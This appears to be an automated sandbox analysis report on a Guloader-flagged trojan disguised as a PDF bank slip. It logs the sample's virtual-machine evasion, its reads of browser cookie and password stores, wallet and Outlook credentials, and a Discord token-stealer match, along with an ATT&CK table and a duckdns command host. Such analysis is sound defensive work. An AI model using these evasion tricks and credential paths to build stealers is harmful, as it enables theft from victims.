Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	RDTSC instruction interceptor: First address: 2551D52 second address: 2551D52 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7180B3D834h 0x00000006 test bh, ch 0x00000008 test ecx, eax 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c cmp bl, al 0x0000000e rdtsc

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Memory allocated: 3890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Memory allocated: 34150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Memory allocated: 36150000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Window / User API: threadDelayed 2588			Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Window / User API: threadDelayed 5990			Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

API coverage: 3.7 %

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -31015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30464s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30122s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 3728	Thread sleep time: -30013s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe TID: 2788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405642
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_004060A4 FindFirstFileA,FindClose,	0_2_004060A4
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 0_2_0040270B FindFirstFileA,	0_2_0040270B
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_00405642 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	6_2_00405642
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_0040270B FindFirstFileA,	6_2_0040270B
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Code function: 6_2_004060A4 FindFirstFileA,FindClose,	6_2_004060A4

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 32000	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31890	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31781	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31672	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31562	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31453	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31343	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31234	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31124	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 31015	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30906	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30796	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30687	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30578	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30464	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30359	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30250	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30122	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 30013	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039FE000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen4win32_process.handle='{0}'
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000353CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	API call chain: ExitProcess graph end node			graph_0-3797
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	API call chain: ExitProcess graph end node			graph_0-3976

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Process created: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe "C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Queries volume information: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Code function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405DC2

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrumm
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty#
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\configigfig\Config.json
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2799540825.0000000036BB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match

File source: Process Memory Space: BANK SLIP_TT COPY 2-13-2024_pdf.exe PID: 6432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	41 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	246 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	331 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	51 Virtualization/Sandbox Evasion	Distributed Component Object Model	2 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BANK SLIP_TT COPY 2-13-2024_pdf.exe	25%	Virustotal		Browse
BANK SLIP_TT COPY 2-13-2024_pdf.exe	38%	ReversingLabs	Win32.Trojan.Guloader
BANK SLIP_TT COPY 2-13-2024_pdf.exe	100%	Avira	HEUR/AGEN.1336713

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
ghos008.duckdns.org	46.161.0.101	true	false	high
drive.google.com	172.217.18.14	true	false	high
drive.usercontent.google.com	142.250.185.225	true	false	high
241.42.69.40.in-addr.arpa	unknown	unknown	false	high
82.148.8.0.in-addr.arpa	unknown	unknown	true	unknown
